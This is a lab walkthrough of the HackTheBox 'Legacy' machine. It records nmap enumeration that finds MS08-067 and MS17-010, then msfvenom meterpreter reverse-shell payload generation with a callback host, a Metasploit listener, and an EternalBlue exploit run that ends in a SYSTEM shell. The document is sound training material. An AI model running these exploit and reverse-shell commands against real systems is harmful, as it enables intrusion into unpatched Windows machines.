This post is about the Walkthrough of the hackthebox machine: Legacy
Hackthebox Legacy Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:53 EST
Nmap scan report for 10.10.10.4
Host is up (0.054s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.4
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:53 EST
Nmap scan report for 10.10.10.4
Host is up.
All 65535 scanned ports on 10.10.10.4 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -p 139,445,3389 -Pn -sC -sV -oN detailed.txt 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:54 EST
Nmap scan report for 10.10.10.4
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m49s, deviation: 1h24m51s, median: 4d23h57m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a0:ca (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-02-27T10:52:47+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.08 seconds
─$ sudo nmap -p 139,445,3389 -script VULN 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:59 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
After the Scan we have got many information. We know its windows “XP"PC with hostname “LEGACY”. It may be vulnarable to 2 exploits shown below:
MS08-067
MS17-010
SMB enumeration Link to heading
Before proceeding with MS17-010( eternal blue exploit)lets try enumerating smb ports
sudo nmap -p 139,445 -script smb-enum-shares.nse 10.10.10.4
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 03:51 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
| account_used: <blank>
| \\10.10.10.4\ADMIN$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access: <none>
| \\10.10.10.4\C$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access: <none>
| \\10.10.10.4\IPC$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -p 139,445 -script smb-enum-users.nse 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 03:52 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
No anonymous login is allowed for these shares. The scan clearly shows above that ms17-010( eternal blue) exploit is applicable in this case. Unfortunatly i could not find any python3 script which can be used foe exploitation. There are python2 scripts avaiable. However your VM should be configured with python2 and pip.
─$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git 1 ⨯
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 126, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 126 (delta 40), reused 35 (delta 35), pack-reused 76
Receiving objects: 100% (126/126), 94.22 KiB | 302.00 KiB/s, done.
Resolving deltas: 100% (74/74), done.
┌──(rocky㉿kali)-[~/tool/exp]
└─$ cd AutoBlue-MS17-010
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ pip install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220218.140931.6042675a-py3.9.egg (from -r requirements.txt (line 1)) (0.9.25.dev1+20220218.140931.6042675a)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.16.0)
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ sudo pip install -r requirements.txt
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220218.140931.6042675a-py3.9.egg (from -r requirements.txt (line 1)) (0.9.25.dev1+20220218.140931.6042675a)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.16.0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ./shell_prep.sh
zsh: no such file or directory: ./shell_prep.sh
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ls 127 ⨯
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ cd shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010/shellcode]
└─$ ls
eternalblue_kshellcode_x64.asm eternalblue_kshellcode_x86.asm eternalblue_sc_merge.py shell_prep.sh
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010/shellcode]
└─$ ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.12
LPORT you want x64 to listen on:
8989
LPORT you want x86 to listen on:
8989
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0
Type 0 to generate a staged payload or 1 to generate a stageless payload
0
Generating x64 meterpreter shell (staged)...
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.12 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin
Generating x86 meterpreter shell (staged)...
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.12 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Now start listerner script. In this case it was not useful as the machine was very old. However this method can be used for new machines.
rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ls
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ./listener_prep.sh
__
/,-
||)
\\_, )
`--'
Enternal Blue Metasploit Listener
LHOST for reverse connection:
10.10.14.12
LPORT for x64 reverse connection:
8989
LPORT for x86 reverse connection:
8989
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Type 0 if this is a staged payload or 1 if it is for a stageless payload
0
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service.
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
https://metasploit.com
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (config.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.12
LHOST => 10.10.14.12
resource (config.rc)> set LPORT 8989
LPORT => 8989
resource (config.rc)> set ExitOnSession false
ExitOnSession => false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (config.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (config.rc)> set LPORT 8989
[*] Started reverse TCP handler on 10.10.14.12:8989
LPORT => 8989
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 10.10.14.12:8989:- -
[-] Handler failed to bind to 0.0.0.0:8989:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8989).
msf6 exploit(multi/handler) >
python eternalblue_exploit7.py 10.10.10.4 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 5.1
This exploit does not support this target
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python eternalblue_exploit7.py 10.10.10.4 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 5.1
This exploit does not support this target
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python eternalblue_exploit8.py 10.10.10.4 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 5.1
This exploit does not support this target
The reason it did not work because the script does not work old windows. So the same folder it has some other scripts which works on Windows XP.
$ ls
config.rc eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python zzz_exploit.py 10.10.10.4
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b25760
SESSION: 0xe10946b8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe20671b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2067250
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\WINDOWS\system32>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>dir